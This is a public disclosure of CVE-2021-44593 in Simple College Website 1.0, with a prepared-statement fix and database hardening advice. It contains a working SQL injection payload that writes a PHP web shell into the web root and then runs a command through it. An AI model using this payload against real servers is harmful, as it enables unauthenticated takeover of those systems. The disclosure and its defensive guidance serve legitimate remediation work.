Public disclosure of CVE-2021-44593. A SQL injection/arbitrary file upload/remote code execution vulnerability in Simple College Website.
Simple College Website 1.0 is vulnerable to an unauthenticated union-based SQL injection in the "username" parameter of the /admin/login.php page, which can then be leveraged to upload arbitrary files and gain remote code execution.
The vulnerable code is the login() function in admin_class.php. Steps to reproduce:
- Access the admin login page (usually /admin/login.php)
- Submit the login form with the POST parameter "username" containing the following UNION-based SQL injection:
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
- Navigate to /testing.php?cmd=id
Prerequisites for the file-write step:
- Knowledge of the web server root directory location is needed.
- Knowledge of the document root directory location may also be needed if it is not the same as the web server root directory.
- Further, the MySQL daemon needs to have write permissions for said directory.
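As an added defensive example (this is not code from the Simple College Website project; the users table, its column names and the use of password_hash() are assumptions), the same lookup written with a mysqli prepared statement. The username is bound as data rather than concatenated into the query text, so input of the form shown above cannot change the shape of the statement or append an INTO OUTFILE clause:

```php
<?php
// Added example, not the project's own code. Table and column names are assumed.
// The query text is fixed; the username travels to the server as a bound
// parameter, so quotes and SQL keywords in it are never parsed as SQL.
function login(mysqli $db, string $username, string $password): ?array
{
    $sql = 'SELECT id, username, password FROM users WHERE username = ? LIMIT 1';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Assumes passwords were stored with password_hash(); compare in constant time.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row; // authenticated user record without the hash
}

// Usage (constructed connection values):
// $db = new mysqli('127.0.0.1', 'college_app', 'secret', 'college');
// $user = login($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
```

Independently of the code fix, the file-write step in the chain relies on the database account holding the FILE privilege and on MySQL's secure_file_priv permitting writes under the document root. Running the application under a database account without FILE, and with secure_file_priv set to NULL or to a directory outside the web root (check with SHOW VARIABLES LIKE 'secure_file_priv'), removes that step even where an injection remains.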